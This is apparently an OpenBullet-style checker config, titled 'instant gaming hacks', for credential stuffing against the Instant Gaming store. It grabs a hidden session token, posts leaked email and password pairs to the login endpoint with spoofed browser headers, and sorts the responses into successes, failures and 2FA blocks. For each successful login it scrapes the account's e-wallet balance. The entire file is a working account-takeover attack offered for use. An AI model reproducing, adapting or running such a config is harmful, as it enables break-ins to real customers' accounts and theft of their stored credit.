[SETTINGS]
{
  "Name": "instant gaming",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-11-02T09:39:13.5119365+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "instant gaming hacks",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://www.instant-gaming.com/en/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"usid\" value=\"" "\" />" -> VAR "usid" 

REQUEST POST "https://www.instant-gaming.com/en/" 
  CONTENT "email=<USER>&password=<PASS>&usid=<usid>&process=login&ajax=true&did=<usid>&pluginsdata=Chrome+PDF+Plugin%3A%3APortable+Document+Format%3A%3Aapplication%2Fx-google-chrome-pdf~pdf%3BChrome+PDF+Viewer%3A%3A%3A%3Aapplication%2Fpdf~pdf%3BNative+Client%3A%3A%3A%3Aapplication%2Fx-nacl~%2Capplication%2Fx-pnacl~&did=<usid>&pluginsdata=Chrome+PDF+Plugin%3A%3APortable+Document+Format%3A%3Aapplication%2Fx-google-chrome-pdf~pdf%3BChrome+PDF+Viewer%3A%3A%3A%3Aapplication%2Fpdf~pdf%3BNative+Client%3A%3A%3A%3Aapplication%2Fx-nacl~%2Capplication%2Fx-pnacl~" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "content-length: 654" 
  HEADER "content-type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "origin: https://www.instant-gaming.com" 
  HEADER "referer: https://www.instant-gaming.com/en/" 
  HEADER "sec-ch-ua: \"Google Chrome\";v=\"87\", \" Not;A Brand\";v=\"99\", \"Chromium\";v=\"87\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" 
  HEADER "x-requested-with: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "user_id" 
  KEYCHAIN Failure OR 
    KEY "Invalid email or password." 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "To ensure your account protection, we have sent you an email with a link to verify this new browser." 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "user_id\":null" 

REQUEST GET "https://www.instant-gaming.com/en/my-credits/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#balance PARSE "<SOURCE>" LR "ewallet: " "," CreateEmpty=FALSE -> CAP "balance" 

